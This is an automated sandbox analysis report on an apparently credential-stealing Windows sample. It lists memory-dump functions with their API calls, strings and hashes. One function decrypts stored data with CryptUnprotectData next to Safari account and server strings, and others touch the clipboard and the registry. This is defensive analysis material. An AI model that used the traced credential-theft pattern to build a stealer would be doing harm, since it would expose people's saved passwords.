                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: CreateFile
                                • String ID:
                                • API String ID: 823142352-0
                                • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004096DC, Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                Download Yara Rule
                                APIs
                                • CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: CreateFile
                                • String ID:
                                • API String ID: 823142352-0
                                • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040AA04, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: ??3@
                                • String ID:
                                • API String ID: 613200358-0
                                • Opcode ID: 0d059ad067989d1f17bbe0e8521da585270b5c486309d81f35087ee814750848
                                • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                • Opcode Fuzzy Hash: 0d059ad067989d1f17bbe0e8521da585270b5c486309d81f35087ee814750848
                                • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040B04B, Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: ??3@
                                • String ID:
                                • API String ID: 613200358-0
                                • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004135E0, Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                Download Yara Rule
                                APIs
                                • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: FreeLibrary
                                • String ID:
                                • API String ID: 3664257935-0
                                • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                                • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041493C, Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                Download Yara Rule
                                APIs
                                • EnumResourceNamesW.KERNELBASE(?,?,004148B6,00000000), ref: 0041494B
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: EnumNamesResource
                                • String ID:
                                • API String ID: 3334572018-0
                                • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0044DEA5, Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                Download Yara Rule
                                APIs
                                • FreeLibrary.KERNELBASE(00000000), ref: 0044DEB6
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: FreeLibrary
                                • String ID:
                                • API String ID: 3664257935-0
                                • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040AEBE, Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                Download Yara Rule
                                APIs
                                • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: CloseFind
                                • String ID:
                                • API String ID: 1863332320-0
                                • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00414592, Relevance: 1.5, APIs: 1, Instructions: 7registryCOMMON
                                Download Yara Rule
                                APIs
                                • RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: Open
                                • String ID:
                                • API String ID: 71445658-0
                                • Opcode ID: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                • Instruction ID: 4e31294bd56c0fd8f54a78566f459ab053e1b17b284f5820c9a90ca28514d216
                                • Opcode Fuzzy Hash: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                • Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00409B98, Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                Download Yara Rule
                                APIs
                                • GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: AttributesFile
                                • String ID:
                                • API String ID: 3188754299-0
                                • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00415308, Relevance: 1.5, APIs: 1, Instructions: 5COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: ??3@
                                • String ID:
                                • API String ID: 613200358-0
                                • Opcode ID: f87c29ce762407ddd0adaed4fac3176b7b3a7b6aeb3172bf8294812ce0be7fe2
                                • Instruction ID: 5e082493cfe38c59748d9de5a46a99a47989c0e105afa31b953e1adb18ef7a34
                                • Opcode Fuzzy Hash: f87c29ce762407ddd0adaed4fac3176b7b3a7b6aeb3172bf8294812ce0be7fe2
                                • Instruction Fuzzy Hash: 17900282455501105C0425755C06505110808A313A376074A7032955D1CE188060601D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041BE52, Relevance: 1.3, APIs: 1, Instructions: 99COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b24af7433d330108988894de74f75be26998b58131ab4cc11d8f9b1f19dcffda
                                • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                                • Opcode Fuzzy Hash: b24af7433d330108988894de74f75be26998b58131ab4cc11d8f9b1f19dcffda
                                • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00415B2C, Relevance: 1.3, APIs: 1, Instructions: 62COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c75aee8a2a8dfae17061e24b09256e9f24568c4c4acdadc464b978748c80593b
                                • Instruction ID: 56811e6a31311fae19106e74f332fd481794b0d175407c03959d21f12539f693
                                • Opcode Fuzzy Hash: c75aee8a2a8dfae17061e24b09256e9f24568c4c4acdadc464b978748c80593b
                                • Instruction Fuzzy Hash: 4201E572109E01E6DB1029278C81AF766899FC0399F14016FF94886281EEA8EEC542AE
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00445403, Relevance: 1.3, APIs: 1, Instructions: 60COMMON
                                Download Yara Rule
                                APIs
                                • memset.MSVCRT ref: 00445426
                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                  • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                  • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                • String ID:
                                • API String ID: 1828521557-0
                                • Opcode ID: 30388877fc1f1466cb5fc4dbbd946ecf0cc3df28c932be715bfff3731eba89eb
                                • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                • Opcode Fuzzy Hash: 30388877fc1f1466cb5fc4dbbd946ecf0cc3df28c932be715bfff3731eba89eb
                                • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040AFCF, Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052
                                • ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: ??2@??3@
                                • String ID:
                                • API String ID: 1936579350-0
                                • Opcode ID: b7d64a9db0ab8f7e7b6c625ee8b1c93a5659d73149cb5b89327274070e360fa5
                                • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                                • Opcode Fuzzy Hash: b7d64a9db0ab8f7e7b6c625ee8b1c93a5659d73149cb5b89327274070e360fa5
                                • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Non-executed Functions

                                Function 004044A4, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 52libraryloaderwindowCOMMON
                                Download Yara Rule
                                APIs
                                • LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044C3
                                • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                • FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044E9
                                • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: Library$AddressFreeLoadMessageProc
                                • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                • API String ID: 2780580303-317687271
                                • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                                • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041881C, Relevance: 12.1, APIs: 8, Instructions: 70timeCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                • String ID:
                                • API String ID: 4218492932-0
                                • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                                • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004182CE, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69windowCOMMON
                                Download Yara Rule
                                APIs
                                • GetLastError.KERNEL32 ref: 004182D7
                                  • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                • LocalFree.KERNEL32(?), ref: 00418342
                                • ??3@YAXPAX@Z.MSVCRT ref: 00418370
                                  • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,74B05970,?,0041755F,?), ref: 00417452
                                  • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: FormatMessage$??3@ByteCharErrorFreeLastLocalMultiVersionWidemalloc
                                • String ID: OsError 0x%x (%u)
                                • API String ID: 403622227-2664311388
                                • Opcode ID: d5c6fe0526594b2b514a1ddbfaf48a72c8b645ad5f50ee8d851b871b7e219225
                                • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                                • Opcode Fuzzy Hash: d5c6fe0526594b2b514a1ddbfaf48a72c8b645ad5f50ee8d851b871b7e219225
                                • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041183A, Relevance: 4.5, APIs: 3, Instructions: 44fileclipboardCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                  • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                  • Part of subcall function 00409A45: GetTempFileNameW.KERNEL32(?,0040B827,00000000,?), ref: 00409A85
                                • OpenClipboard.USER32(?), ref: 00411878
                                • GetLastError.KERNEL32 ref: 0041188D
                                • DeleteFileW.KERNEL32(?), ref: 004118AC
                                  • Part of subcall function 004098E2: EmptyClipboard.USER32 ref: 004098EC
                                  • Part of subcall function 004098E2: GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                  • Part of subcall function 004098E2: GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                  • Part of subcall function 004098E2: GlobalFix.KERNEL32(00000000), ref: 00409927
                                  • Part of subcall function 004098E2: ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                  • Part of subcall function 004098E2: GlobalUnWire.KERNEL32(00000000), ref: 0040994C
                                  • Part of subcall function 004098E2: SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                  • Part of subcall function 004098E2: CloseHandle.KERNEL32(?), ref: 00409969
                                  • Part of subcall function 004098E2: CloseClipboard.USER32 ref: 0040997D
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: ClipboardFile$Global$CloseTemp$AllocDataDeleteDirectoryEmptyErrorHandleLastNameOpenPathReadSizeWindowsWire
                                • String ID:
                                • API String ID: 1203541146-0
                                • Opcode ID: 8203c75a959afec2194f5aa533a4bdb737a0ecca75d5d58e610bfa137ec1d4e9
                                • Instruction ID: 30b21b9b2413019ae2959f490c9fe9c3e0a1eb79cd5a134b572bdad6ddd06780
                                • Opcode Fuzzy Hash: 8203c75a959afec2194f5aa533a4bdb737a0ecca75d5d58e610bfa137ec1d4e9
                                • Instruction Fuzzy Hash: C7F0A4367003006BEA203B729C4EFDB379DAB80710F04453AB965A62E2DE78EC818518
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041739B, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                Download Yara Rule
                                APIs
                                • GetVersionExW.KERNEL32(?), ref: 004173BE
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: Version
                                • String ID:
                                • API String ID: 1889659487-0
                                • Opcode ID: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                • Instruction ID: 34334e4c1a53cba42546035453d5331cf18162d9798f59f763323439a3546438
                                • Opcode Fuzzy Hash: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                • Instruction Fuzzy Hash: BAE0463590131CCFEB24DB34DB0B7C676F5AB08B46F0104F4C20AC2092D3789688CA2A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00402279, Relevance: 110.5, APIs: 9, Strings: 54, Instructions: 285COMMON
                                Download Yara Rule
                                APIs
                                • _wcsicmp.MSVCRT ref: 004022A6
                                • _wcsicmp.MSVCRT ref: 004022D7
                                • _wcsicmp.MSVCRT ref: 00402305
                                • _wcsicmp.MSVCRT ref: 00402333
                                  • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                  • Part of subcall function 0040AA29: memcpy.MSVCRT ref: 0040AA5B
                                • memset.MSVCRT ref: 0040265F
                                • memcpy.MSVCRT ref: 0040269B
                                  • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                  • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                  • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                • memcpy.MSVCRT ref: 004026FF
                                • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: _wcsicmp$Freememcpy$Library$AddressCryptDataLocalProcUnprotectmemsetwcslen
                                • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                • API String ID: 2929817778-1134094380
                                • Opcode ID: 50789d42b67ef9cbe8ec8181fd3a7e8d092fde0b3f08ce177d697f6554f1c07e
                                • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                • Opcode Fuzzy Hash: 50789d42b67ef9cbe8ec8181fd3a7e8d092fde0b3f08ce177d697f6554f1c07e
                                • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040C87B, Relevance: 54.5, APIs: 27, Strings: 4, Instructions: 285stringCOMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
